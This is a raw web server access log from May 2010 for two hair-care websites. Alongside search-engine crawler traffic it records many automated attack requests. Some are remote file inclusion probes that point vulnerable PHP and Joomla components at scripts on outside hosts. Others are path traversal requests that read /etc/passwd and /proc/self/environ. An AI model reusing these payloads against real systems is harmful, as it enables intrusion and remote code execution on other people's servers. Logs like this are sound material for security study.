210.109.108.186 - - [23/May/2010:23:45:07 -0700] "GET /logs/access_100208.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
210.109.108.186 - - [23/May/2010:23:45:07 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
210.109.108.186 - - [23/May/2010:23:45:10 -0700] "GET /logs/access_100201.log%20%20///skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.artistcollabo.com/MAIN/images/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
210.109.108.186 - - [23/May/2010:23:45:10 -0700] "GET /logs///skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.artistcollabo.com/MAIN/images/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
210.109.108.186 - - [23/May/2010:23:45:10 -0700] "GET //skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.artistcollabo.com/MAIN/images/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
112.216.153.186 - - [23/May/2010:23:45:22 -0700] "GET /logs/access.log%20%20///?path=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
112.216.153.186 - - [23/May/2010:23:45:22 -0700] "GET //?path=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "www.freehairsecrets.com"
112.216.153.186 - - [23/May/2010:23:45:22 -0700] "GET /logs///?path=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 200 5520 "-" "Mozilla/5.0" "www.freehairsecrets.com"
210.109.108.186 - - [23/May/2010:23:46:18 -0700] "GET /logs/access_100118.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
210.109.108.186 - - [23/May/2010:23:47:27 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
210.109.108.186 - - [23/May/2010:23:47:27 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.135.249.219 - - [23/May/2010:23:47:27 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" "growlonghairfast.com"
210.109.108.186 - - [23/May/2010:23:47:28 -0700] "GET /logs/access.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.135.249.219 - - [23/May/2010:23:47:30 -0700] "GET /freehairsecretsphp/viewtopic.php?p=7759 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" "growlonghairfast.com"
210.109.108.186 - - [23/May/2010:23:47:32 -0700] "GET /logs///skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.artistcollabo.com/MAIN/images/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
210.109.108.186 - - [23/May/2010:23:47:33 -0700] "GET //skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.artistcollabo.com/MAIN/images/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
210.109.108.186 - - [23/May/2010:23:47:34 -0700] "GET /logs/access_100222.log%20%20///skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.artistcollabo.com/MAIN/images/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.88.25.28 - - [23/May/2010:23:49:49 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12838 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
61.135.249.219 - - [23/May/2010:23:50:22 -0700] "GET /freehairsecretsphp/viewtopic.php?p=906 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" "growlonghairfast.com"
61.135.249.219 - - [23/May/2010:23:53:14 -0700] "GET /freehairsecretsphp/viewtopic.php?p=9817 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" "growlonghairfast.com"
174.37.199.180 - - [23/May/2010:23:55:20 -0700] "GET //appserv/main.php?appserv_root=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.37.199.180 - - [23/May/2010:23:55:20 -0700] "GET /logs///appserv/main.php?appserv_root=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.37.199.180 - - [23/May/2010:23:55:20 -0700] "GET /logs/access_100125.log///appserv/main.php?appserv_root=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.135.249.219 - - [23/May/2010:23:56:09 -0700] "GET /freehairsecretsphp/viewtopic.php?p=6131 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" "growlonghairfast.com"
189.108.172.26 - - [23/May/2010:23:56:16 -0700] "GET /logs/access.log/http://www.fitzmartyn.co.uk/blog/ipays/readme.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
189.108.172.26 - - [23/May/2010:23:56:17 -0700] "GET /http://www.fitzmartyn.co.uk/blog/ipays/readme.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
189.108.172.26 - - [23/May/2010:23:56:18 -0700] "GET /logs/http://www.fitzmartyn.co.uk/blog/ipays/readme.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
189.108.172.26 - - [23/May/2010:23:56:47 -0700] "GET /logs/access.log/http://www.fitzmartyn.co.uk/blog/ipays/readme.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
189.108.172.26 - - [23/May/2010:23:56:49 -0700] "GET /http://www.fitzmartyn.co.uk/blog/ipays/readme.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
189.108.172.26 - - [23/May/2010:23:56:50 -0700] "GET /logs/http://www.fitzmartyn.co.uk/blog/ipays/readme.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
189.108.172.26 - - [23/May/2010:23:59:31 -0700] "GET /logs/access.log/http://www.fitzmartyn.co.uk/blog/ipays/readme.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
189.108.172.26 - - [23/May/2010:23:59:32 -0700] "GET /http://www.fitzmartyn.co.uk/blog/ipays/readme.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
189.108.172.26 - - [23/May/2010:23:59:33 -0700] "GET /logs/http://www.fitzmartyn.co.uk/blog/ipays/readme.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.freehairsecrets.com"
121.88.4.141 - - [24/May/2010:00:03:29 -0700] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.141 - - [24/May/2010:00:03:29 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.141 - - [24/May/2010:00:03:30 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
61.135.249.219 - - [24/May/2010:00:04:58 -0700] "GET /freehairsecretsphp/viewtopic.php?p=8816 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" "growlonghairfast.com"
217.73.226.100 - - [24/May/2010:00:06:41 -0700] "GET /logs/access.log%20%20//skin/board/moviefl/download.php?board_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
217.73.226.100 - - [24/May/2010:00:06:41 -0700] "GET /skin/board/moviefl/download.php?board_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
217.73.226.100 - - [24/May/2010:00:06:41 -0700] "GET /logs//skin/board/moviefl/download.php?board_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.88.25.28 - - [24/May/2010:00:07:40 -0700] "GET /freehairsecretsphp/viewtopic.php?p=8223 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
217.73.226.100 - - [24/May/2010:00:08:06 -0700] "GET /skin/board/moviefl/download.php?board_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
217.73.226.100 - - [24/May/2010:00:08:06 -0700] "GET /logs//skin/board/moviefl/download.php?board_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
217.73.226.100 - - [24/May/2010:00:08:07 -0700] "GET /logs/access_100510.log%20%20//skin/board/moviefl/download.php?board_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.215.216.30 - - [24/May/2010:00:08:10 -0700] "GET /logs//skin/ggambo7002_board/comment_modify.php?dir=http://www.artistcollabo.com/MAIN/images/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.215.216.30 - - [24/May/2010:00:08:10 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.artistcollabo.com/MAIN/images/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.215.216.30 - - [24/May/2010:00:08:10 -0700] "GET /logs/access_100322.log%20%20//skin/ggambo7002_board/comment_modify.php?dir=http://www.artistcollabo.com/MAIN/images/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
217.73.226.100 - - [24/May/2010:00:08:42 -0700] "GET /skin/board/moviefl/download.php?board_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
217.73.226.100 - - [24/May/2010:00:08:42 -0700] "GET /logs//skin/board/moviefl/download.php?board_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
217.73.226.100 - - [24/May/2010:00:08:42 -0700] "GET /logs/access.log//skin/board/moviefl/download.php?board_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
217.73.226.100 - - [24/May/2010:00:12:15 -0700] "GET /skin/board/moviefl/download.php?board_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
217.73.226.100 - - [24/May/2010:00:12:15 -0700] "GET /logs//skin/board/moviefl/download.php?board_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
217.73.226.100 - - [24/May/2010:00:12:15 -0700] "GET /logs/access_100510.log//skin/board/moviefl/download.php?board_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.63.60.50 - - [24/May/2010:00:14:09 -0700] "GET /logs/snippet.reflect.php?reflect_base=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
211.63.60.50 - - [24/May/2010:00:14:21 -0700] "GET /logs/snippet.reflect.php?reflect_base=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
211.63.60.50 - - [24/May/2010:00:14:27 -0700] "GET /logs/snippet.reflect.php?reflect_base=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.63.60.50 - - [24/May/2010:00:14:33 -0700] "GET /logs/snippet.reflect.php?reflect_base=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
84.40.30.37 - - [24/May/2010:00:18:38 -0700] "GET /logs/access.log%20%20/error.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
84.40.30.37 - - [24/May/2010:00:18:38 -0700] "GET /error.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
84.40.30.37 - - [24/May/2010:00:18:38 -0700] "GET /logs/error.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
202.108.50.76 - - [24/May/2010:00:19:05 -0700] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
164.78.248.57 - - [24/May/2010:00:19:15 -0700] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
94.236.54.5 - - [24/May/2010:00:19:43 -0700] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
209.126.254.139 - - [24/May/2010:00:19:57 -0700] "GET /logs/access.log%20%20/error.php?dir=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
209.126.254.139 - - [24/May/2010:00:19:57 -0700] "GET /logs/error.php?dir=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
209.126.254.139 - - [24/May/2010:00:19:57 -0700] "GET /error.php?dir=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
164.78.248.57 - - [24/May/2010:00:19:58 -0700] "GET / HTTP/1.1" 200 926 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
67.231.246.189 - - [24/May/2010:00:20:02 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
123.125.156.136 - - [24/May/2010:00:20:05 -0700] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
123.125.156.136 - - [24/May/2010:00:20:06 -0700] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
84.40.30.37 - - [24/May/2010:00:20:27 -0700] "GET /logs/error.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
84.40.30.37 - - [24/May/2010:00:20:27 -0700] "GET /logs/access.log%20%20/error.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
84.40.30.37 - - [24/May/2010:00:20:27 -0700] "GET /error.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
201.218.12.54 - - [24/May/2010:00:20:33 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
94.236.54.5 - - [24/May/2010:00:20:45 -0700] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
164.78.248.57 - - [24/May/2010:00:20:56 -0700] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
213.218.140.69 - - [24/May/2010:00:21:46 -0700] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
123.125.156.136 - - [24/May/2010:00:21:48 -0700] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
77.88.25.28 - - [24/May/2010:00:22:05 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12633 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
200.51.203.200 - - [24/May/2010:00:22:29 -0700] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
60.217.232.70 - - [24/May/2010:00:22:54 -0700] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
164.78.248.57 - - [24/May/2010:00:22:56 -0700] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
91.206.183.174 - - [24/May/2010:00:22:56 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01" "growlonghairfast.com"
91.206.183.174 - - [24/May/2010:00:22:57 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01" "growlonghairfast.com"
202.108.50.76 - - [24/May/2010:00:22:57 -0700] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
195.5.128.137 - - [24/May/2010:00:22:59 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
194.159.14.250 - - [24/May/2010:00:23:17 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
60.217.232.70 - - [24/May/2010:00:23:19 -0700] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
123.125.156.136 - - [24/May/2010:00:23:21 -0700] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
123.125.156.143 - - [24/May/2010:00:23:23 -0700] "GET /freehairsecretsphp/index.php HTTP/1.1" 200 349 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
123.125.156.142 - - [24/May/2010:00:23:25 -0700] "GET / HTTP/1.1" 200 926 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.freehairsecrets.com"
67.195.111.220 - - [24/May/2010:00:27:54 -0700] "GET /logs/access_100412.log HTTP/1.0" 200 2139776 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
119.63.198.84 - - [24/May/2010:00:28:27 -0700] "GET /freehairsecretsphp/viewtopic.php?p=4599 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.freehairsecrets.com"
119.63.198.86 - - [24/May/2010:00:28:31 -0700] "GET /freehairsecretsphp/viewtopic.php?p=4514 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.freehairsecrets.com"
91.215.216.30 - - [24/May/2010:00:29:51 -0700] "GET /logs/access_100322.log//skin/ggambo7002_board/comment_modify.php?dir=http://www.artistcollabo.com/MAIN/images/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.111.176.53 - - [24/May/2010:00:30:12 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
78.110.50.119 - - [24/May/2010:00:30:18 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
78.110.50.119 - - [24/May/2010:00:30:27 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
79.174.72.69 - - [24/May/2010:00:30:28 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
78.110.50.119 - - [24/May/2010:00:31:23 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
89.111.176.53 - - [24/May/2010:00:31:23 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
78.110.50.119 - - [24/May/2010:00:31:25 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
79.174.72.69 - - [24/May/2010:00:31:26 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
209.126.254.139 - - [24/May/2010:00:34:28 -0700] "GET /logs/access.log/error.php?dir=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
89.111.176.53 - - [24/May/2010:00:35:32 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
78.110.50.119 - - [24/May/2010:00:35:37 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
211.63.60.50 - - [24/May/2010:00:35:43 -0700] "GET /logs/access.log//logs/snippet.reflect.php?reflect_base=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
211.63.60.50 - - [24/May/2010:00:35:44 -0700] "GET /logs/snippet.reflect.php?reflect_base=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
